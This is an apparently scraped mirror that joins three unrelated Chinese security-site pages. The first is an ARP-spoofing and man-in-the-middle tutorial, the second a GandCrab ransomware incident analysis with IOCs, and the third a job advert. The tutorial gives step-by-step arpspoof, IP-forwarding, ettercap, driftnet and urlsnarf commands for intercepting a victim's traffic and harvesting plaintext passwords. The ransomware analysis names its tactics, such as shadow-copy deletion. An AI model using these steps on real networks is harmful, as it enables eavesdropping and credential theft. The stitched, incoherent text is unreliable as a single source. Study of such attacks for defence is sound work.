arp攻击

首页
文章

漏洞
SRC导航
内容精选

输入关键词搜索

APP 登录| 注册
浅谈Arp攻击和利用Arp欺骗进行MITM
阅读量 109610 | 评论 4 稿费 300

分享到: QQ空间 新浪微博 微信 QQ facebook twitter
发布时间:2018-07-16 17:00:43

索引
arp欺骗也是很古老的渗透手段了,主要起着信息收集的作用,比如你可以利用欺骗获取对方的流量,从流量分析你认为重要的信息,例如某某账号密码。或是利用Arp攻击,切断局域网内某一用户的网络访问(单向欺骗)。下面着重讲一下中间人攻击的原理,配和实战演练分析,不对的地方,还请大家多多反馈和包涵!

MITM
借用Wiki百科的一个比喻来理解MITM(中间人攻击):

假设爱丽丝(Alice)希望与鲍伯(Bob)通信。同时,马洛里(Mallory)希望拦截窃会话以进行窃听并可能在某些时候传送给鲍伯一个虚假的消息。

首先,爱丽丝会向鲍勃索取他的公钥。如果Bob将他的公钥发送给Alice,并且此时马洛里能够拦截到这个公钥,就可以实施中间人攻击。马洛里发送给爱丽丝一个伪造的消息,声称自己是鲍伯,并且附上了马洛里自己的公钥(而不是鲍伯的)。
爱丽丝收到公钥后相信这个公钥是鲍伯的,于是爱丽丝将她的消息用马洛里的公钥(爱丽丝以为是鲍伯的)加密,并将加密后的消息回给鲍伯。马洛里再次截获爱丽丝回给鲍伯的消息,并使用马洛里自己的私钥对消息进行解密,如果马洛里愿意,她也可以对消息进行修改,然后马洛里使用鲍伯原先发给爱丽丝的公钥对消息再次加密。当鲍伯收到新加密后的消息时,他会相信这是从爱丽丝那里发来的消息。
我们的身份就是Mallory,我们希望欺骗Alice和Bob,让其认为我们是交互的正确目标,从而来获取他们之间交流的信息。

Arp攻击分析
想要进行中间人攻击,先理解最基础的arp攻击

Arp协议
ARP(Address Resolution Protocol,地址解析协议)是一个位于TCP/IP协议栈中的网络层,负责将某个IP地址解析成对应的MAC地址。

以太网(局域网)进行信息传输时,不是根据IP地址进行通信,因为IP地址是可变的,用于通信是不安全的。然而MAC地址是网卡的硬件地址,一般出厂后就具有唯一性。ARP协议就是将目标IP地址解析成MAC地址进行验证通信。

Arp通信过程
每台主机都会在自己的ARP缓冲区建立一个ARP列表(生命周期二十分钟),用于表示IP地址和MAC地址的对应关系。
主机A若想和主机B通信,首先主机A会查询Arp缓存表(后面称ip-mac缓存表)是否有B主机对应的ip-mac,有的话就将B主机的mac地址封装到数据包发送。若没有的话,主机A会向以太网发送一个Arp广播包,告诉以太网内的所有主机自己的ip-mac,并请求B主机(以ip来表示B主机)的mac地址。当B主机收到Arp广播包后,确认A主机是想找自己的mac地址,就会对A主机进行回应一个自己的mac地址。A主机就会更新自己的ip-mac缓存表,同时B主机也会接收A主机的ip-mac对应关系到自己的ip-mac缓存表。
Arp协议缺陷
ARP协议信任以太网所有的节点,效率高但是不安全。这份协议没有其它字协议来保证以太网内部信息传输的安全,它不会检查自己是否接受或发送过请求包,只要它就收到的arp广播包,他就会把对应的ip-mac更新到自己的缓存表

网关的理解
在wiki中这样定义网关:

在计算机网络中,网关(英语:Gateway)是转发其他服务器通信数据的服务器,接收从客户端发送来的请求时,它就像自己拥有资源的源服务器一样对请求进行处理。有时客户端可能都不会察觉,自己的通信目标是一个网关

区别于路由器(由于历史的原因,许多有关TCP/IP的文献曾经把网络层使用的路由器(英语:Router)称为网关,在今天很多局域网采用都是路由来接入网络,因此现在通常指的网关就是路由器的IP),经常在家庭中或者小型企业网络中使用,用于连接局域网和Internet。

网关也经常指把一种协议转成另一种协议的设备,比如语音网关。

网关可以把内网ip转化为外网ip,从而向服务器发出请求。也可以把外网Ip获得的数据包转换成内网ip发给内网主机。

Arp攻击原理
根据以上说的arp协议缺陷,如果我们冒充网关主机C,不停的向以太网发送自己的ARP广播包,告知自己的ip-mac,此时其它主机就会被欺骗,更新我们C的ip-mac为网关主机的ip-mac,那么其它主机的数据包就会发送到C主机上,因为没有发给真正的网关,就会造成其它主机的网络中断。

Arp攻击实操
环境
攻击主机A:Kali—>ip: 192.168.11.106
被攻击主机B: windows 7—>ip: 192.168.11.105
网关主机C: 192.168.11.1

我的Kali是在虚拟机下,需要Bridge连接保证机器在同一网段,很多人用Nat连接来转发,在实战的轻快下,需要更改虚拟机的网络配置。

网络配置如图:

实操
这里模拟真实环境,攻击主机A和被攻击主机B在同一局域网下。
1. 先用命令查看一下ip是否正确:
Kali:

可以看到ip是192.168.11.106
Windows7:

ip是192.168.11.105,网关地址是192.108.11.1
2. 用nmap查看当前网端的活跃主机

nmap -sF 192.168.11.0/24

扫描得到如图活跃主机,可以看到我们的主机B。当然获取Ip的途径不可能这么简单,你也可以用fping的方法来分析,之前我用fping探测局域网windows10的主机,发现Ping不通,win10防火墙还是有点东西。不过你可以根据fping的发送包来推断主机是否真正存活,具体可以google一下fping的用法,这里给推荐一个链接

Kali信息收集:Fping

3. 检查被攻击主机是否可以正常上网

百度正常访问

4. 利用Arpspoof进行欺骗攻击
Kali自带的Arpspoof可以很好的进行欺骗,man arpspoof查看官网手册(网上翻译):

名字
arpspoof # 截获交换局域网中的数据包

用法
arpspoof [-i interface] [-c own|host|both] [-t target] [-r] host

描述
# arpspoof通过伪造的ARP响应包改变局域网中从目标主机(或所有主机)到另一个主机(host)的数据包转发路径。这是交换局域网中嗅探网络流量的一种极为有效的方法。内核IP转发(或如fragrouter这样的、用户层面的、能完成同样功能的软件)必须提前开启。

参数
-i interface
# 指定要使用的接口(即指定一块网卡)

-c own|host|both
# 指定在恢复ARP配置时使用的硬件地址;当在清理(cleaning up)时,数据包的源地址可以用自己的也可以用主机(host)的硬件地址。使用伪造的硬件地址可能导致某些配置下的交换网络、AP网络或桥接网络通信中断,然而它比起默认值————使用自己的硬件地址要工作地更为可靠。

-t target
# 指定一个特殊的、将被ARP毒化的主机(如果没有指定,则认为是局域网中所有主机)。重复可以指定多个主机。

-r
# 毒化两个主机(目标和主机(host))以捕获两个方向的网络流量。(仅仅在和-t参数一起使用时有效)

host #你想要截获数据包的主机 (通常是网关)。
5. 主机A作为网关主机欺骗
命令语句

arpspoof -i eth0 -t 192.168.11.105 192.168.1.1

执行命令,Kali会向主机B发送ARP响应包,响应包的内容是Kali的ip-mac地址,而响应包里的ip则是网关主机ip地址。每一行代表一个响应包。从左到右:自己Kali的mac、主机B的mac、帧类型码(0806,代表ARP包)、包大小、包内容。

6. 被攻击主机B网络中断
我们在B主机用arp -a查看一下是否欺骗成功

可以看到,网关主机C和攻击者主机A的mac地址相同,欺骗成功

在kali终端输入control + c 可以停止,清空并恢复原来正确的arp相应包,主机重新恢复联网状态

基于Arp攻击理解下的MITM
在前面Arp成功进行攻击后,我们开始作为中间人进行欺骗,需要设置ip转发,获取目标主机B的流量,其后配合其它工具(drifnet)等进行进一步嗅探。

值得一提的是,我们的Arp攻击也是欺骗,但它是单向欺骗,冒充网关主机来欺骗目标主机。实际中,中间人攻击一般是双向欺骗。即作为中间人,主机A双向欺骗主机B与C获得通信内容,但是不破坏通信数据的传输。为了不影响B与C传输的数据丢失,主机A开启ip转发,开启后来自B主机的数据包经过A主机的Kali后转发给主机C。欺骗两个主机B和C后,我们就能嗅探到双向数据包。

如果你的kali在虚拟机,那么以下步骤均需要一个外置的usb无线网卡。在虚拟机中,网络的连接比较复杂,而Ip转发很大程度上取决于网卡性能。如果你是在虚拟机中Kali进行转发,基本都会失败,因为笔记本的内置无限网卡满足不了需求。由于放假在家我的usb无线网卡落在了寝室..下面仅以文字给大家介绍攻击的思路和流程,还请见谅…….

linux的ip转发
linux因为系统安全,是不支持IP转发的,其配置文件写在/proc/sys/net/ipv4的ip_forward中。默认为0,需要修改为1。

开启方法大致有两种:

只接进入文件修改
cd /proc/sys/net/ipv4
ls
cat ip_forward
#显示结果为0
echo 1 > ip_forward
cat ip_forward
#显示结果为1,修改成功
使用echo
# echo “1”> /proc/sys/net/ipv4/ip_forward
对网关和目标主机B的双向欺骗
这里进行一步执行,选用第二种Ip转发手段
命令如下:

root@kali:~# echo 1 > /proc/sys/net/ipv4/ip_forward && arpspoof -i eth0 -t 192.168.11.105 -r 192.168.11.1
利用driftnet进程监控
持续保持欺骗,再重新打开一个命令终端。
输入命令:

root@kali:~# driftnet -i eth0
跳出来的drift窗口即会显示本机正在浏览的图片

使用ettercap工具获取密码
打开新的终端,输入 attercap -G 启动工具
点击Sniff -> unified sniffing,选择要抓包的网卡,默认是自己的网卡eth0,点确定
然后单击Hosts -> Scan for host,待扫描完成后再次Scan for host,此时可以看到ettercap-NG已经扫描的主机列表
选择攻击目标,点击192.168.11.105的ip地址,点击Add to Target 1 ,然后选择网关的ip地址192.168.11.1,点击Add to Target 2
明确目标攻击方式:点击Mitm -> arp poisoning -> Sniff remote connections -> 确定
开始监听:start -> Start sniffing
工具就会抓取主机B的数据包和主机C返回的数据包,分析http post请求可以判断账号密码信息。

urlsnarf:获得受害者的HTTP请求
输入命令:

root@kali:~# urlsnarf -i eth0
使用Wireshark抓包
使用Wireshark抓取所有的数据包,过滤分析不同请求,类似于ettercap。
例如,要找HTTP POST请求,过滤,查看明文密码,一般是以POST形式上传的账号密码。

关于Arp欺骗的防御

防御原理很简单,就是不让攻击者肆意表明自己就是网关主机。我们进入网关主机(路由器后台地址),网络参数一栏一般有ip与mac绑定一栏,把网关的mac地址与网关地址绑定就好了。只要确定了对应关系,当攻击者发布arp相应包时,就不会更新相应的ip-mac缓存表。

我们重新进行欺骗后,再查询B主机的arp缓存表,如图

网关主机的mac并没有被欺骗成功,我们的防御达到目的

如果想知道对方主机的ip地址其实也容易。我们在Cmd下键入命令arp -a看一下相同mac,就找到了攻击者。

总结
公共区域的wifi存在钓鱼风险
在传输数据过程中尽量使用加密程序
本文由安全客原创发布
转载,请参考转载声明,注明出处: https://www.anquanke.com/post/id/151762
安全客 – 有思想的安全新媒体
中间人攻击 Arp攻击分析 获取流量

Hpdoger 认证 分享到: QQ空间 新浪微博 微信 QQ facebook twitter
|推荐阅读

看我如何绕过 iPhone XS 中指针验证机制(下)
2019-02-28 16:00:54

SA-CORE-2019-003:Drupal 远程命令执行分析
2019-02-28 15:30:37

URLZone:疑似针对日本高科技企业雇员的攻击活动分析
2019-02-28 14:55:25

Windows 下的权限维持
2019-02-28 14:30:26
|发表评论
发表你的评论吧
昵称
Anonymous
换一个
|评论列表
Ea5ter · 2018-09-18 20:13:55 1 回复
好厉害的呢

大表姐 · 2018-07-17 05:52:41 1 回复
分析的过程太过于专业和复杂,非专业人士只看结果便可,网络危险无处不在,信息安全真的很重要。

越南邻国宰相 · 2018-07-17 17:03:07 回复
安全类技术分享,这说的很详细了吧

男科圣手 · 2018-07-17 13:35:10 1 回复
这个还好吧

Hpdoger
Blog:hpdoger.me
文章
4
粉丝
6
TA的文章
FireShellCTF2019 Bad Injections解题记录
2019-01-30 12:00:44
四个实例递进php反序列化漏洞理解
2018-09-12 16:30:13
代码审计入门级DedecmsV5.7 SP2分析复现
2018-08-26 14:00:56
浅谈Arp攻击和利用Arp欺骗进行MITM
2018-07-16 17:00:43
输入关键字搜索内容
相关文章
看我如何绕过 iPhone XS 中指针验证机制(下)
SA-CORE-2019-003:Drupal 远程命令执行分析
URLZone:疑似针对日本高科技企业雇员的攻击活动分析
热门推荐
文章目录
索引
MITM
Arp攻击分析
Arp协议
Arp通信过程
Arp协议缺陷
网关的理解
Arp攻击原理
Arp攻击实操
环境
实操
基于Arp攻击理解下的MITM
linux的ip转发
对网关和目标主机B的双向欺骗
利用driftnet进程监控
使用ettercap工具获取密码
urlsnarf:获得受害者的HTTP请求
使用Wireshark抓包
关于Arp欺骗的防御
总结
安全客Logo
安全客
安全客
关于我们
加入我们
联系我们
用户协议
商务合作
合作内容
联系方式
友情链接
内容须知
投稿须知
转载须知
合作单位
安全客
安全客
Copyright ? 360网络攻防实验室 All Rights Reserved 京ICP备08010314号-66
Loading…0daybank

crab

crab
首页
文章

漏洞
SRC导航
内容精选

输入关键词搜索

APP 登录| 注册
近期GandCrab勒索事件详细分析
阅读量 159597 | 评论 6

分享到: QQ空间 新浪微博 微信 QQ facebook twitter
发布时间:2018-11-05 15:00:44

作者:Kshom@360观星实验室

勒索事件概述
从2018年9月底开始,根据数据监测GandCrab勒索有大规模爆发趋势,且版本更新频繁。在国内GandCrab目前仍以弱口令爆破、伪装正常软件诱导用户运行及漏洞传播这三种方式传播。当用户遭受感染时,系统磁盘被加密,文件后缀被修改为随机字母,并勒索交付数字货币赎金。 本文将对勒索事件应急中的一些经验与大家分享

PS: GandCrab作者曾向被加密的叙利亚受害者道歉公布了5.0.3以前版本的密钥,随后更新了5.0.4版本并将叙利亚排除在加密区域之外,但是在10月最新的5.0.5版本又将这个区域设定删除

样本勒索执行流程

勒索样本分析
虽然GandCrab勒索病毒更新比较频繁,但代码框架变动不大,为保持文章完整性,这里对勒索的流程和细节进行梳理,以10月最新的5.0.5版本分析为主。
MD5: C805528F6844D7CAF5793C025B56F67D

从GandCrabV4版本之后,作者对函数调用入口做了处理,增加静态分析难度,此处入口为 loc_4061B3

遍历进程,结束占用特定文件的进程,为能正常加密文件做准备

结束的进程如下

检测特定的互斥量

这里的互斥量对应了样本中嵌入的DLL,决定是否开启利用两个提权漏洞进行提权DLL通过xor 0x18解密后,内存执行并通过管道与主进程通信

通过VerifyVersionInfoW判断操作系统MajorVersion是否为6以上

判断当前进程权限及安全身份RID,判断是否大于0x1000,这是确认当前进程是否为system组启动,以上两步均是判断操作系统是否为win7以上

判断是否为俄语系键盘语言及输入法

5.0.4版本中作者将叙利亚列入未加密区域,在5.0.5中又将其删除

5.0.5如下图所示,5.0.4版本如上图所示

将系统盘磁盘卷区的序号与特定字符串拼接加密后计算hash值,以此创建Mutex变量

随后使用内置的密钥解密出RSA公钥

当前版本RSA公钥如下

查找是否存在相关杀软进程

从注册表中取处理器相关信息拼成字符串计算CRC32值

获取机器信息,生成ransomId并拼接成字符串

随后通过RC4对这部分数据加密,RC4密钥为”jopochlen”

加密后的数据如下

在GandCrabV5版本后,加密文件后生成后缀变为随机

提取中要加密文件的类型及其后缀

使用CryptGenKey及CryptExportKey生出并导出公私密钥对,并查找注册表HKCUSOFTWAREkeys_datadata及HKLMSOFTWAREkeys_datadata两项,作者检查HKCU及HKLM为确保样本在非管理员权限以上启动也可正常写入注册表

若这两个注册表项均不存在,则先创建HKLM(HKCU)SOFTWAREex_datadata项,并生成ext子项中存储此次勒索后缀。

生成RSA公钥加密后的密钥

将密钥信息写入到注册表HKLM(HKCU)SOFTWAREkeys_datadata的public和private中

若这些注册表项已经存在则会使用HKLM(HKCU)SOFTWAREkeys_datadata项中原有的密钥及对应的后缀继续加密

将加密提示写入到txt文件中

并将加密后的密钥Base64保存

创建线程开始加密

加密会分别枚举网络资源和本地文件,枚举网络资源如下

以下目录不加密

以下文件不加密

存在随机生成的字符串则在目录下生成XXXXX-DECRYPT.txt勒索信息文件,否则生成KRAB-DECRYPT.txt

使用随机生成的字符串为后缀,若不存在则使用KRAB后缀

递归遍历磁盘目录,加密流程如下

加密函数与老版本基本相同

最后末尾写入0x21c大小的加密数据

将机器信息Base64编码后发送到某些域名

解密出的域名如下图

通过执行vssadmin delete删除巻影镜像防止恢复

勒索完成后会自删除

在GandCrabV5版本后,会在%TEMP%目录下创建并更改系统壁纸,展示勒索信息

在GandCrabV5版本后,作者增加了多个提权漏洞利用,有影响Win7、WinServer 2008及WinServer 2008 R2提权漏洞CVE-2018-8120

影响Win7以上的操作系统的提权漏洞CVE-2018-8440

Win10提权漏洞CVE-2018-0896

至此勒索样本分析完成

事件溯源分析
在2018年10月18日,360观星实验室团队在处理用户应急时,发现内网遭遇勒索,文件后缀被加密为PWFKPFCP,在磁盘目录下发现PWFKPFCP-DECRYPT.txt文件,根据特征判断用户感染了GandCrab勒索软件

对于被感染的用户,使用了观星实验室应急响应分析平台,对用户相关系统提取关键日志等信息,通过关联分析,大致得出黑客攻击的路径,具体如下:

无论是前段时间爆发的GlobeImposter勒索、Crysis勒索还是近期的GandCrab勒索,以弱口令爆破为主要攻击手法的黑客团伙已经拥有非常成熟的流程和工具。

在对收集上来的日志进行关联分析时,发现对KProcessHacker服务的加载时间来统计其时间轴进行初步定位

从数据得出在2018年10月16日22点57分,KProcessHacker服务已被加载,其登录分析行为如下

在暴力破解检测中发现从2018年10月14日开始,用户机器已经遭受大量爆破攻击

并发现了两条可疑的RDP登录记录

一条记录指向是X.X.X.60这台机器,在2018年10月18日凌晨2点29分通过Administrator RDP登录,这台60机器显然也是受害机器,但时间已经晚于KProcessHacker加载时间

另一条记录指向是X.X.X.171这台机器,在2018年10月16日22点56分通过Administrator RDP登录,这台机器的登录时间与KProcessHacker服务的加载时间相近且在其之前

深入分析171机器,同样发现了大量爆破记录

在2018年10月17日凌晨4点05分Administrator被重置密码

随即在2018年10月17日凌晨4点13分开始,恶意ip 119.129.75.111登录

并在2018年10月17日 17点27分将Administrator添加为Oracle超级管理员

继续对X.X.X.171机器关联分析发现X.X.X.164机器被更多的恶意ip登录

针对乌克兰193.238.46.96等ip分析,发现存在明显的扫描和爆破行为

对所有登录事件关联分析如下图所示

通过以上分析,基本确认出此次攻击的发起点及攻击路径

处置建议
对于已经感染的服务器立即下线隔离
在网络边界防火墙上全局关闭3389端口或3389端口只对特定IP开放
开启Windows防火墙,尽量关闭3389、445、139、135等不用的高危端口
每台服务器设置唯一口令,且复杂度要求采用大小写字母、数字、特殊符号混合的组合结构,口令位数足够长(15位、两种组合以上)
及时修复系统漏洞

安全建议
系统、应用相关的用户杜绝使用弱口令,同时,应该使用高复杂强度的密码,尽量包含大小写字母、数字、特殊符号等的混合密码,加强管理员安全意识,禁止密码重用的情况出现
禁止服务器主动发起外部连接请求,对于需要向外部服务器推送共享数据的,应使用白名单的方式,在出口防火墙加入相关策略,对主动连接IP范围进行限制
有效加强访问控制ACL策略,细化策略粒度,按区域按业务严格限制各个网络区域以及服务器之间的访问,采用白名单机制只允许开放特定的业务必要端口,其他端口一律禁止访问,仅管理员IP可对管理端口进行访问,如FTP、数据库服务、远程桌面等管理端口
配置并开启相关关键系统、应用日志,对系统日志进行定期异地归档、备份,避免在攻击行为发生时,导致无法对攻击途径、行为进行溯源等,加强安全溯源能力
针对服务器,不仅要安装带主动防护的杀毒软件,最好部署安全加固软件,阻断黑客攻击

参考链接及IOC
IOC:

c805528f6844d7caf5793c025b56f67d

f8853def4c82a9075ff0434c13ceca23

c805528f6844d7caf5793c025b56f67d

“GandCrab勒索病毒最新疫情”- 360安全卫士

“Rapidly Evolving Ransomware GandCrab Version 5 Partners With Crypter Service for Obfuscation”- Mcafee

本文由安全客原创发布
转载,请参考转载声明,注明出处: https://www.anquanke.com/post/id/163414
安全客 – 有思想的安全新媒体
GandGrab

360观星实验室 认证 分享到: QQ空间 新浪微博 微信 QQ facebook twitter
|推荐阅读

Anatova勒索病毒详细分析
2019-02-28 11:38:43

警惕!WinRAR漏洞利用升级:社工、加密、无文件后门
2019-02-28 10:10:25

Pwn FruitShop的故事(下)
2019-02-27 16:30:53

风雨欲来:恶意软件 Brushaloader 深入分析
2019-02-27 15:30:33
|发表评论
发表你的评论吧
昵称
网瘾患者
换一个
|评论列表
咸鱼 · 2018-11-05 18:24:28 回复
这日志分析平台叫啥

咸鱼 · 2018-11-05 18:21:44 回复
不明觉厉。,

大表哥 · 2018-11-05 17:02:46 回复
师傅有点牛啊

越南邻国宰相 · 2018-11-05 16:10:17 1 回复
厉害了

越南邻国宰相 · 2018-11-05 16:10:14 1 回复
厉害了

x0r · 2018-11-05 15:57:12 1 回复
有点犀利

360观星实验室
360企业安全观星实验室成立于2017年,主要的研究方向包括攻防技术研究、安全数据分析、应急响应、攻击溯源等方向,致力于为企业客户提供全方位专业的安全技术支持。
文章
4
粉丝
6
TA的文章
Nexus Repository Manager 3 远程代码执行漏洞 (CVE-2019-7238) 分析及利用
2019-02-18 12:16:47
近期GandCrab勒索事件详细分析
2018-11-05 15:00:44
php-fpm环境的一种后门实现
2018-11-01 14:30:38
机器学习在Windows RDP版本和后门检测上的应用
2018-08-22 09:00:05
输入关键字搜索内容
相关文章
Anatova勒索病毒详细分析
警惕!WinRAR漏洞利用升级:社工、加密、无文件后门
Pwn FruitShop的故事(下)
风雨欲来:恶意软件 Brushaloader 深入分析
CVE-2018-0296 Cisco ASA 拒绝服务漏洞分析
Video Downloader(Plus)Chrome插件漏洞分析:绕过CSP实现UXSS
Pwn FruitShop的故事(上)
热门推荐
文章目录
勒索事件概述
样本勒索执行流程
勒索样本分析
事件溯源分析
处置建议
安全建议
参考链接及IOC
安全客Logo
安全客
安全客
关于我们
加入我们
联系我们
用户协议
商务合作
合作内容
联系方式
友情链接
内容须知
投稿须知
转载须知
合作单位
安全客
安全客
Copyright ? 360网络攻防实验室 All Rights Reserved 京ICP备08010314号-66
Loading…0daybank

八分量

首页
文章

漏洞
SRC导航
内容精选

输入关键词搜索

APP 登录| 注册
北京八分量信息科技有限公司招聘(海龟团队、前沿技术)
阅读量 50420 | 评论 4

分享到: QQ空间 新浪微博 微信 QQ facebook twitter
发布时间:2017-12-22 17:22:33
2017已经到了年底,还记得年初立下的flag吗?紧不紧张!!!
![](https://p5.ssl.qhimg.com/t01f75c410f0461e17d.jpg)
减肥、脱单、旅游、加薪,有哪个是实现了的?时间既是是道好的送分题,更是一道送命题!

2017年只剩10天了!10天?可能还没有10天了

年底,又在做总结、计划、写材料、做汇报、开大会,头疼、焦虑、烦躁不?是不是觉得忙了一年,想干事的没几件办成?想做点事情,想改变点什么,那么考虑下加入我们吧。

公司简介
八分量是一家由牛津、北大博士创立的信息安全公司,专注于服务器安全领域,致力于解决企业信息系统面临的未知威胁,为以服务器为核心的企业信息系统提供全运行周期的安全保护。在可信计算、UEBA、区块链研究等有着深入的探索跟实践,已与北京大学软微学院、浙江清华长三角研究院合作建立了联合实验室。同时,与牛津大学 OeRC 中心、牛津大学信息安全中心等保持密切沟通合作,共同推动产业研究与创新发展。
官网:www.8lab.cn

办公地点
北京

招聘岗位
测试工程师(10k-20k)
工作内容:

(1)负责公司产品的相关测试工作
(2)参与完成公司产品需要的SRE/DevOps配套自动化测试环境
(3)参与设计测试用例;发现并解决产品研发和测试过程中的技术、流程等方面的问题
(4)参与接口、前端,自动化测试框架、测试工具的设计和开发

岗位要求:

(1)熟悉phabricator 、Bugfree、QC、JIRA等测试管理工具中的一种;
(2)具有测试开发经验者优先,熟悉软件测试流程与技术,有大型项目的测试经验者优先 ;
(3)熟悉Python、JAVA或C/C++其中一种的使用,熟悉Linux/Unix相关原理;
(4)熟悉单元测试、功能测试、压力测试等原理与概念;
(5)具备良好的测试代码编写与测试文档编写的工程习惯;
(6)熟悉jenkins相关的持续集成与自动测试的配合工作;
(7)具有优秀的沟通能力和团队合作能力;
(8)具有认真负责的专业素养、积极主动的工作态度、和良好的学习能力;

加分项(具备以下其中一项就可以):

(1)了解Selenium、JMeter 等自动化测试框架与工具的一种;
(2)了解Charles、Mocha、Jasmine、Sahi 、Siege等web、移动端自动化测试框架与工具的一种;
了解TDD/BDD的相关实施方法和原理;

机器学习工程师(10k-20k)
岗位要求:

(1)熟悉JAVA、Python、C/C++、GO语言中的其中一种;
(2)熟悉常用的数据挖掘和机器学习算法LR,Boost,SVM,贝叶斯,掌握常用的特征工程,以及探测和利用的方法等;
(3)较好的模型评估技能,能够正确客观地对模型效果进行评估以改进模型以及优化参数;
(4)熟悉Scikit-learn、Mahout、MLlib、Weka等常用机器学习库其中一个的使用方法;
(5)了解常见深度学习平台Caffe,Paddle,TensorFlow,DMTK,MXNET等其中一种;
(6)良好的逻辑思维能力和数据敏感度,能能够从海量数据中发现有价值的规律
(7)具备良好的分析和解决问题的能力,具备一定的钻研精神和持续学习的意愿,强烈的责任感和团队感,对负有挑战性的工作充满热情。

加分项(具备以下其中一项就可以):

(1)有kaggle/OI / ACM / TopCoder / GCJ / Codeforces 等算法竞赛获奖经历者优先;
(2)有在CCF 机器学习相关领域A类/B类发表学术成果优先;
(3)有深度学习项目实际应用经验优先;
(4)有海量数据分析挖掘项目经验,应用在推荐、语义识别、反作弊、聚类、分类、用户画像等场景中的一种优先;

后端开发工程师(10k-20k)
岗位要求:

(1)本科及以上学历,熟悉JAVA、Python、C/C++语言中的其中一种;
(2)了解KVM、Xen相关虚拟机的原理,并有一定的基于虚拟机的相关开发与调试经验;
(3)熟悉操作系统的相关原理,具备多线程/进程的相关开发经验,熟练应用IPC等相关机制;
(4)熟悉数据库的相关原理,具备一种或者几种常见数据库的相关开发经验,比如mysql、PostgreSQL、MongoDB、Cassandra、Redis等。
(5)了解openstack相关组件的原理,具备一定的相关开发或者使用部署经验;
(6)具备良好的设计模式、代码规范、团队合作能力,对新技术或问题能独立学习,思考解决问题;

加分项(具备以下其中一项就可以):

(1)熟悉渗透测试、WAF、防火墙、入侵检查、漏洞扫描等;
(2)了解linux内核安全机制;
(3)了解可信计算相关原理或具备相关开发经验;
(4)具备分布式与负载均衡相关项目开发经验;

安全工程师(10k-20k)
岗位要求:

(1)本科及以上学历,1年以上计算机安全相关领域经验。
(2)了解WEB安全和漏洞原理(如SQL注入、XSS攻击、命令注入、CSRF攻击等),了解CC、DDOS攻击,熟悉一(3)定各种应对的安全技术,有成功抵御的经验者优先。
(3)定各种应对的安全技术,有成功抵御的经验者优先。
(4)了解常见的加密算法以及DEX、ELF加壳脱壳经验。
(5)了解Windows/Linux/Unix平台kail渗透测试、后门分析、加固等。
(6)熟悉一门或多门脚本语言(Java/Perl/Python/lua/php)的使用,并且能够根据需求开发相应的安全工具。
(7)需至少满足上述2-5条件中的一条。

加分项(具备以下其中一项就可以):

(1)有IDS、IPS、WAF等相关安全产品开发经验者优先。
(2)有web程序、app漏洞挖掘经验者优先考虑。

运维工程师(10k-20k)
工作内容:

(1)编写运维工具,满足产品日常数据统计及展现的需求;
(2)参与管理大量自有PC端和手机终端的应用部署、日常运维工作;
(3)负责业务系统的应用级别维护。内容包括:应用异常维护,系统日常更新、部署等;
(4)整理编写运维工作需要的技术文档。

岗位要求:

(1)本科及以上学历,1-3年以上实际运维工程师工作经验,有创业公司或者IT大公司工作经验优先,有信息安全或互联网门户网站工作经验优先;
(2)熟悉使用shell,python等脚本语言中的一种,并具备一定的开发能力,能够进行简单的运维工具开发;

加分项(具备以下其中一项就可以):

(1)了解zabbix、nagois等监控系统的搭建和维护,能够开发自定义脚本;
(2)了解Nginx/Apache/Tomcat等Web应用服务器其中一种的部署、优化;
(3)了解MySQL、redis、mongodb等数据库其中一种,相关集群部署,监控,优化;
(4)了解自动化配置工具,如ansible、saltstack、puppet等其中的一种;

产品经理(15k-30k)
工作内容:

(1)产品生命周期管理:产品立项、制定产品和实施方案、产品相关认证等产品周期
(2)产品规划、需求管理:负责有效组织和管理产品的业务需求和特性,并牵头对产品提出下一步规划
(3)产品营销推广与产品定价及销售政策调整
(4)产品培训:负责撰写产品介绍相关资料,面向客户以及公司内部销售,技术,售后等部门进行产品培训
(5)产品支持:提供基于产品的大项目售前支持,行业入围支持,特殊重点项目的支持等;

岗位要求:

(1)本科以上学历,熟悉信息安全行业,熟悉主流安全产品
(2)具备3年以上网络安全行业产品经理、售前工程师等相关工作经验,熟悉信息安全体系框架
(3)对产品的未来发展有清晰完整的见解,了解产品及竞争对手的最新动态;
(4)性格开朗,具有较强的沟通、组织、策划能力,良好的团队合作精神
(5)具备较强的逻辑思维能力、学习创新能力、数据分析能力和语言表达能力;
(6)有重大安全项目或产品成功经验者优先

人力资源经理(10k-20k)
工作内容:

(1)负责参与公司人力资源的总体规划及发展,对整体人力资源体系进行优化;
(2)建立并完善公司人力资源管理体系,在招聘、绩效、薪酬等方面建立适合公司的人力资源管理模式,建立有效的制度并组织实施;
(3)协调公司各部门关系,建立上下级员工沟通渠道,更好发挥员工积极能动性;
(4)负责公司招聘工作及员工入离转调流程
(5)向高层决策者提供有关人力资源战略、组织建设等方面的建议;合理利用人力资源成本,提高公司整体的综合管理水平。

岗位要求:

(1)3以上人力资源工作工作经验;
(2)本科及以上学历,人力资源或管理类等相关专业,211、985院校优先;
(3)有互联网行业工作经验,有安全行业人力工作经验者优先
(4)对现代化企业人力资源管理模式有一定的认识,了解互联网人才现状,对初创公司的人力资源管理体系有一定研究;
(5)具有良好的沟通能力与人际交往能力,学习能力强,执行力出众。

员工福利
规定的几险几金该有的都有,零食水果随便拿,不定期轰趴,大节日礼包,反正团建正经合影照片没留下多少,都是吃吃喝喝的……

联系方式
简历投递至: hrzhaopin@8lab.cn (请注明来自安全客)

安全招聘发布请联系安全客 duping@360.cn

商务合作,文章发布请联系 dengjinling@360.cn
招聘 北京 八分量

八分量 分享到: QQ空间 新浪微博 微信 QQ facebook twitter
|推荐阅读

Anatova勒索病毒详细分析
2019-02-28 11:38:43

警惕!WinRAR漏洞利用升级:社工、加密、无文件后门
2019-02-28 10:10:25

Pwn FruitShop的故事(下)
2019-02-27 16:30:53

风雨欲来:恶意软件 Brushaloader 深入分析
2019-02-27 15:30:33
|发表评论
发表你的评论吧
昵称
Dir溢出大神
换一个
|评论列表
软微第一菜 · 2017-12-22 19:08:19 回复
给学长打call

妇科圣手 · 2017-12-22 18:13:09 回复
妹纸们好漂亮呀,可惜在帝都……

parker · 2017-12-26 22:28:45 回复
你是饥渴成啥样

杨教授 · 2017-12-24 19:35:55 回复
眼瞎啊你。

八分量
这个人太帅了,签名都懒得写一个
文章
1
粉丝
0
TA的文章
北京八分量信息科技有限公司招聘(海龟团队、前沿技术)
2017-12-22 17:22:33
输入关键字搜索内容
相关文章
招聘 | Zoom公司诚聘安全人才
招聘 | 2019四叶草安全一大波招聘,你准备好了吗?
招聘 | 风暴中心年薪20W~50W,数10个新工位虚位以待
招聘 | 安恒重庆招聘安全研究员
民生银行招聘资深安全工程师
